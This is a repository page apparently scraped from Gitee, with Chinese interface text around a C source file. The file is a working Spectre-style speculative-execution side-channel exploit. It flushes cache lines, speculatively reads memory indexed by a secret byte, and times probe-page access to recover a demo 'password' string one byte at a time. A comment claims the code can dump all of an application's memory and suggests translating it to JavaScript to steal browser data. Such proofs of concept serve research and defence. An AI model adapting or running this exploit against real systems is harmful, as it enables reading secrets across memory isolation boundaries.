代码拉取完成,页面将自动刷新
同步操作将从 idea4good/spectre 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h>
#pragma optimize("gt",on)
#else
#include <x86intrin.h>
#endif
#define PAGE_SIZE (1024*4)
#define PAGE_NUM 256
#define PROBE_TIMES 50000
#define CACHE_HIT_THRESHOLD (150) /* assume cache hit if access delay <= threshold */
uint8_t probe_pages[PAGE_NUM * PAGE_SIZE];
static int cache_hit_times[PAGE_NUM];
static inline int get_access_delay(volatile char *addr){
unsigned long long time1, time2;
unsigned junk;
time1 = __rdtscp(&junk);
(void)*addr;
time2 = __rdtscp(&junk);
return time2 - time1;
}
void move_one_page_in_cache(uint8_t* addr) {
static int github_idea4good = -1;//if "github_idea4good = 1", "PROBE_TIMES = 100" will be enough.
_mm_clflush(&github_idea4good);//make github_idea4good out of cache, CPU have to spend more time to get it from memory, and must execute the code below.
if (0 < github_idea4good) {
volatile uint8_t temp = probe_pages[*addr * PAGE_SIZE];
}
}
int probe_memory_byte(uint8_t* addr) {
memset(cache_hit_times, 0, sizeof(cache_hit_times));
for (int tries = 0; tries < PROBE_TIMES; tries++) {
//move probe_pages out of cache
for (int i = 0; i < PAGE_NUM; i++)
_mm_clflush(&probe_pages[i * PAGE_SIZE]);
move_one_page_in_cache(addr);
//find the pages which in cache. Order is lightly mixed up to prevent stride prediction
for (int i = 0; i < PAGE_NUM; i++) {
int mix_i = ((i * 167) + 13) & 255;
if (get_access_delay(&probe_pages[mix_i * PAGE_SIZE]) <= CACHE_HIT_THRESHOLD)
cache_hit_times[mix_i]++;
}
}
//find the page which has highest access frequency.
int max = -1, index_of_max = '?';
for (int i = 0; i < PAGE_NUM; i++) {
if (cache_hit_times[i] && cache_hit_times[i] > max) {
max = cache_hit_times[i];
index_of_max = i;
}
}
return index_of_max;//index_of_max = *addr
}
char* victim_data = "You got my password";
/* This code can dump all memory of the application. In this demo, we dump victim_data without reading it.
If you translate this code into Javascript language, You could dump IE browser data */
int main(int argc, const char * * argv) {
for (int i = 0; i < sizeof(probe_pages); i++)
probe_pages[i] = 1; //write to probe_pages so in RAM, not copy-on-write zero pages
uint8_t* addr = victim_data;
int len = strlen(victim_data);
for(int i = 0; i < len; i++) {
int ret = probe_memory_byte(addr++);
printf("Reading at addr = %p -> %c, 0x%x, %d hits / %d tries\n", addr, ret, ret, cache_hit_times[ret], PROBE_TIMES);
}
}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。